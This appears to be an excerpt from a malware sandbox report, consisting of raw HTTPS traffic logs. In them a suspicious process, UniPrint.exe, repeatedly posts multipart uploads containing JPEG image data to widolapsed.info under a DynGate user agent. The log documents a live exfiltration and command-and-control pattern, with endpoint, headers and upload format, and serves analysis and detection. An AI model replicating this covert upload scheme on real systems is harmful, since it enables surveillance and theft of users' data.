                                                                                                      2021-09-15 11:46:00 UTC1291OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:00 UTC1307OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:00 UTC1323OUTData Raw: fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49
                                                                                                      Data Ascii: +DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4ZV-I
                                                                                                      2021-09-15 11:46:00 UTC1339OUTData Raw: 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75 19 a4 cd 14 5c 2c 3b
                                                                                                      Data Ascii: PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu\,;
                                                                                                      2021-09-15 11:46:00 UTC1350OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 34 32 30 31 37 38 30 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3142017803--
                                                                                                      2021-09-15 11:46:13 UTC1350INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:00 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cf7acf491945062ccba84d5e56673d456edfffe67f71e94ae1b80e303c8e026e; expires=Thu, 15-Sep-2022 11:46:01 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:13 UTC1350INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.34980445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:14 UTC1350OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76637
                                                                                                      Content-Type: multipart/form-data; boundary=--------2197444700
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 39 37 34 34 34 37 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2197444700Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e5 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:14 UTC1367OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:14 UTC1383OUTData Raw: 00 8f e8 be b4 b7 67 37 52 7f bd 58 7f cb d2 df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6
                                                                                                      Data Ascii: g7RX(1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{S
                                                                                                      2021-09-15 11:46:14 UTC1399OUTData Raw: 52 c3 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25
                                                                                                      Data Ascii: R>#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%
                                                                                                      2021-09-15 11:46:14 UTC1415OUTData Raw: 4a 5a 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34
                                                                                                      Data Ascii: JZ(((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4
                                                                                                      2021-09-15 11:46:14 UTC1425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 39 37 34 34 34 37 30 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2197444700--
                                                                                                      2021-09-15 11:46:15 UTC1425INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:14 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=767c8afad45cf6433af0e5e24d8c8a3c2ef6dbdfed1900b5f91c2f28482e82da; expires=Thu, 15-Sep-2022 11:46:14 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:15 UTC1426INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.34980545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:15 UTC1426OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76633
                                                                                                      Content-Type: multipart/form-data; boundary=--------327613734
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 37 36 31 33 37 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------327613734Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:15 UTC1426OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:15 UTC1442OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:15 UTC1458OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:15 UTC1474OUTData Raw: 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f
                                                                                                      Data Ascii: >#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%O
                                                                                                      2021-09-15 11:46:15 UTC1490OUTData Raw: 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c
                                                                                                      Data Ascii: (((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4L
                                                                                                      2021-09-15 11:46:15 UTC1501OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 37 36 31 33 37 33 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------327613734--
                                                                                                      2021-09-15 11:46:16 UTC1501INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:15 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6b11d2c9c96c12b2f73a55eb7b675b9c543bf39010f8901646e662fd86e0db1d; expires=Thu, 15-Sep-2022 11:46:15 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:16 UTC1501INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
